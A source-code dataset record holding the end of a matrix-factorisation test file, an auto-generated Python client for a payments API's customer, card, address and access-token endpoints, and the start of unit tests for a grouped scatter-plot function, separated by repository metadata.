'AutoRho': {'Enabled': True},
'DataType': dt})
b = cmod.CnstrMOD(X, S, opt=opt)
b.solve()
assert(b.X.dtype == dt)
assert(b.Y.dtype == dt)
assert(b.U.dtype == dt)
def test_04(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
dt = np.float32
opt = cmod.CnstrMOD.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True},
'DataType': dt})
b = cmod.CnstrMOD(X, S, opt=opt)
b.solve()
assert(b.X.dtype == dt)
assert(b.Y.dtype == dt)
assert(b.U.dtype == dt)
def test_05(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
dt = np.float64
opt = cmod.CnstrMOD.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True},
'DataType': dt})
b = cmod.CnstrMOD(X, S, opt=opt)
b.solve()
assert(b.X.dtype == dt)
assert(b.Y.dtype == dt)
assert(b.U.dtype == dt)
def test_06(self):
opt = cmod.CnstrMOD.Options({'AuxVarObj': False})
assert(opt['fEvalX'] is True and opt['gEvalY'] is False)
opt['AuxVarObj'] = True
assert(opt['fEvalX'] is False and opt['gEvalY'] is True)
def test_07(self):
opt = cmod.CnstrMOD.Options({'AuxVarObj': True})
assert(opt['fEvalX'] is False and opt['gEvalY'] is True)
opt['AuxVarObj'] = False
assert(opt['fEvalX'] is True and opt['gEvalY'] is False)
| 25.862385
| 73
| 0.467187
| 363
| 2,819
| 3.595041
| 0.198347
| 0.061303
| 0.099617
| 0.064368
| 0.82682
| 0.82682
| 0.786973
| 0.786973
| 0.786973
| 0.786973
| 0
| 0.029499
| 0.398723
| 2,819
| 108
| 74
| 26.101852
| 0.740413
| 0
| 0
| 0.715909
| 0
| 0
| 0.072366
| 0
| 0
| 0
| 0
| 0
| 0.170455
| 1
| 0.090909
| false
| 0.011364
| 0.068182
| 0
| 0.170455
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4ad309062311f156efb1d213710c22ce21f3134
| 38,966
|
py
|
Python
|
mundiapi/controllers/customers_controller.py
|
mundipagg/MundiAPI-PYTHON
|
8bf5a063fe32c9995d6f1964765fe60cae83af19
|
[
"MIT"
] | 10
|
2017-08-30T15:53:00.000Z
|
2021-02-11T18:06:56.000Z
|
mundiapi/controllers/customers_controller.py
|
mundipagg/MundiAPI-PYTHON
|
8bf5a063fe32c9995d6f1964765fe60cae83af19
|
[
"MIT"
] | 3
|
2020-02-20T08:24:05.000Z
|
2021-07-22T14:18:33.000Z
|
mundiapi/controllers/customers_controller.py
|
mundipagg/MundiAPI-PYTHON
|
8bf5a063fe32c9995d6f1964765fe60cae83af19
|
[
"MIT"
] | 7
|
2017-04-27T13:46:52.000Z
|
2021-04-14T13:44:23.000Z
|
# -*- coding: utf-8 -*-
"""
mundiapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
from mundiapi.api_helper import APIHelper
from mundiapi.configuration import Configuration
from mundiapi.controllers.base_controller import BaseController
from mundiapi.http.auth.basic_auth import BasicAuth
from mundiapi.models.get_access_token_response import GetAccessTokenResponse
from mundiapi.models.get_customer_response import GetCustomerResponse
from mundiapi.models.list_access_tokens_response import ListAccessTokensResponse
from mundiapi.models.list_addresses_response import ListAddressesResponse
from mundiapi.models.get_address_response import GetAddressResponse
from mundiapi.models.get_card_response import GetCardResponse
from mundiapi.models.list_cards_response import ListCardsResponse
from mundiapi.models.list_customers_response import ListCustomersResponse
class CustomersController(BaseController):
"""A Controller to access Endpoints in the mundiapi API."""
def create_access_token(self,
customer_id,
request,
idempotency_key=None):
"""Does a POST request to /customers/{customer_id}/access-tokens.
Creates an access token for a customer
Args:
customer_id (string): Customer Id
request (CreateAccessTokenRequest): Request for creating an access
token
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAccessTokenResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAccessTokenResponse.from_dictionary)
def update_customer(self,
customer_id,
request,
idempotency_key=None):
"""Does a PUT request to /customers/{customer_id}.
Updates a customer
Args:
customer_id (string): Customer id
request (UpdateCustomerRequest): Request for updating a customer
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCustomerResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCustomerResponse.from_dictionary)
def delete_access_tokens(self,
customer_id):
"""Does a GET request to /customers/{customer_id}/access-tokens/.
Delete a Customer's access tokens
Args:
customer_id (string): Customer Id
Returns:
ListAccessTokensResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens/'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListAccessTokensResponse.from_dictionary)
def get_customer(self,
customer_id):
"""Does a GET request to /customers/{customer_id}.
Get a customer
Args:
customer_id (string): Customer Id
Returns:
GetCustomerResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCustomerResponse.from_dictionary)
def get_addresses(self,
customer_id,
page=None,
size=None):
"""Does a GET request to /customers/{customer_id}/addresses.
Gets all addresses from a customer
Args:
customer_id (string): Customer id
page (int, optional): Page number
size (int, optional): Page size
Returns:
ListAddressesResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_parameters = {
'page': page,
'size': size
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListAddressesResponse.from_dictionary)
def get_access_token(self,
customer_id,
token_id):
"""Does a GET request to /customers/{customer_id}/access-tokens/{token_id}.
Get a Customer's access token
Args:
customer_id (string): Customer Id
token_id (string): Token Id
Returns:
GetAccessTokenResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens/{token_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'token_id': token_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAccessTokenResponse.from_dictionary)
def get_address(self,
customer_id,
address_id):
"""Does a GET request to /customers/{customer_id}/addresses/{address_id}.
Get a customer's address
Args:
customer_id (string): Customer id
address_id (string): Address Id
Returns:
GetAddressResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses/{address_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'address_id': address_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAddressResponse.from_dictionary)
def create_card(self,
customer_id,
request,
idempotency_key=None):
"""Does a POST request to /customers/{customer_id}/cards.
Creates a new card for a customer
Args:
customer_id (string): Customer id
request (CreateCardRequest): Request for creating a card
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
def renew_card(self,
customer_id,
card_id,
idempotency_key=None):
"""Does a POST request to /customers/{customer_id}/cards/{card_id}/renew.
Renew a card
Args:
customer_id (string): Customer id
card_id (string): Card Id
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards/{card_id}/renew'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'card_id': card_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
def create_customer(self,
request,
idempotency_key=None):
"""Does a POST request to /customers.
Creates a new customer
Args:
request (CreateCustomerRequest): Request for creating a customer
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCustomerResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers'
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCustomerResponse.from_dictionary)
def update_address(self,
customer_id,
address_id,
request,
idempotency_key=None):
"""Does a PUT request to /customers/{customer_id}/addresses/{address_id}.
Updates an address
Args:
customer_id (string): Customer Id
address_id (string): Address Id
request (UpdateAddressRequest): Request for updating an address
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAddressResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses/{address_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'address_id': address_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAddressResponse.from_dictionary)
def get_access_tokens(self,
customer_id,
page=None,
size=None):
"""Does a GET request to /customers/{customer_id}/access-tokens.
Get all access tokens from a customer
Args:
customer_id (string): Customer Id
page (int, optional): Page number
size (int, optional): Page size
Returns:
ListAccessTokensResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_parameters = {
'page': page,
'size': size
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListAccessTokensResponse.from_dictionary)
def update_customer_metadata(self,
customer_id,
request,
idempotency_key=None):
"""Does a PATCH request to /Customers/{customer_id}/metadata.
Updates the metadata of a customer
Args:
customer_id (string): The customer id
request (UpdateMetadataRequest): Request for updating the customer
metadata
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCustomerResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/Customers/{customer_id}/metadata'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.patch(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCustomerResponse.from_dictionary)
def delete_address(self,
customer_id,
address_id,
idempotency_key=None):
"""Does a DELETE request to /customers/{customer_id}/addresses/{address_id}.
Delete a Customer's address
Args:
customer_id (string): Customer Id
address_id (string): Address Id
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAddressResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses/{address_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'address_id': address_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.delete(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAddressResponse.from_dictionary)
def update_card(self,
customer_id,
card_id,
request,
idempotency_key=None):
"""Does a PUT request to /customers/{customer_id}/cards/{card_id}.
Updates a card
Args:
customer_id (string): Customer Id
card_id (string): Card id
request (UpdateCardRequest): Request for updating a card
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards/{card_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'card_id': card_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
def get_cards(self,
customer_id,
page=None,
size=None):
"""Does a GET request to /customers/{customer_id}/cards.
Get all cards from a customer
Args:
customer_id (string): Customer Id
page (int, optional): Page number
size (int, optional): Page size
Returns:
ListCardsResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_parameters = {
'page': page,
'size': size
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListCardsResponse.from_dictionary)
def delete_card(self,
customer_id,
card_id,
idempotency_key=None):
"""Does a DELETE request to /customers/{customer_id}/cards/{card_id}.
Delete a customer's card
Args:
customer_id (string): Customer Id
card_id (string): Card Id
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards/{card_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'card_id': card_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.delete(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
def get_customers(self,
name=None,
document=None,
page=1,
size=10,
email=None,
code=None):
"""Does a GET request to /customers.
Get all Customers
Args:
name (string, optional): Name of the Customer
document (string, optional): Document of the Customer
page (int, optional): Current page of the search
size (int, optional): Page size of the search
email (string, optional): Customer's email
code (string, optional): Customer's code
Returns:
ListCustomersResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers'
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_parameters = {
'name': name,
'document': document,
'page': page,
'size': size,
'email': email,
'Code': code
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListCustomersResponse.from_dictionary)
def delete_access_token(self,
customer_id,
token_id,
idempotency_key=None):
"""Does a DELETE request to /customers/{customer_id}/access-tokens/{token_id}.
Delete a customer's access token
Args:
customer_id (string): Customer Id
token_id (string): Token Id
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAccessTokenResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens/{token_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'token_id': token_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.delete(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAccessTokenResponse.from_dictionary)
def create_address(self,
customer_id,
request,
idempotency_key=None):
"""Does a POST request to /customers/{customer_id}/addresses.
Creates a new address for a customer
Args:
customer_id (string): Customer Id
request (CreateAddressRequest): Request for creating an address
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAddressResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAddressResponse.from_dictionary)
def get_card(self,
customer_id,
card_id):
"""Does a GET request to /customers/{customer_id}/cards/{card_id}.
Get a customer's card
Args:
customer_id (string): Customer id
card_id (string): Card id
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards/{card_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'card_id': card_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
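# --- Illustrative usage sketch (added commentary, not part of the generated controller) ---
# The snippet below only shows how the methods defined above would be called; the
# controller class name and the id values are assumptions, and credentials are expected
# to be configured on the SDK's Configuration object beforehand.
#
# controller = CustomersController()                      # assumed class name
# customers = controller.get_customers(page=1, size=10)   # GET /customers
# card = controller.get_card('cus_example', 'card_example')
# controller.delete_card('cus_example', 'card_example',
#                        idempotency_key='unique-key-123')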
| 36.348881 | 118 | 0.59847 | 3,908 | 38,966 | 5.687308 | 0.041453 | 0.05984 | 0.039683 | 0.047242 | 0.908531 | 0.900297 | 0.892828 | 0.886439 | 0.88113 | 0.870692 | 0 | 0.000541 | 0.335498 | 38,966 | 1,071 | 119 | 36.38282 | 0.857838 | 0.341426 | 0 | 0.821739 | 1 | 0 | 0.093851 | 0.033036 | 0 | 0 | 0 | 0.011204 | 0 | 1 | 0.045652 | false | 0 | 0.026087 | 0 | 0.119565 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
c4df900efd9eb3f0aec47618de0d51d034cbd492 | 27,255 | py | Python | sci_analysis/test/test_graph_groupscatter.py | cmmorrow/sci-analysis | de65ba29fe210eb950daa3dbc2e956963a4770ef | ["MIT"] | 17 | 2017-05-10T18:25:36.000Z | 2021-12-23T14:43:49.000Z | sci_analysis/test/test_graph_groupscatter.py | cmmorrow/sci-analysis | de65ba29fe210eb950daa3dbc2e956963a4770ef | ["MIT"] | 57 | 2016-08-22T23:58:05.000Z | 2019-07-31T06:54:22.000Z | sci_analysis/test/test_graph_groupscatter.py | cmmorrow/sci-analysis | de65ba29fe210eb950daa3dbc2e956963a4770ef | ["MIT"] | null | null | null |
import unittest
import numpy as np
import pandas as pd
import scipy.stats as st
from os import path, getcwd
from ..graphs import GraphGroupScatter
from ..data import Vector
from ..analysis.exc import NoDataError
from ..data import UnequalVectorLengthError
class MyTestCase(unittest.TestCase):
@property
def save_path(self):
if getcwd().split('/')[-1] == 'test':
return './images/'
elif getcwd().split('/')[-1] == 'sci_analysis':
if path.exists('./setup.py'):
return './sci_analysis/test/images/'
else:
return './test/images/'
else:
return './'
def test_1_scatter_two_groups_default(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_1'.format(self.save_path)))
def test_2_scatter_two_groups_no_fit(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], fit=False,
save_to='{}test_group_scatter_2'.format(self.save_path)))
def test_3_scatter_two_groups_no_points(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], points=False,
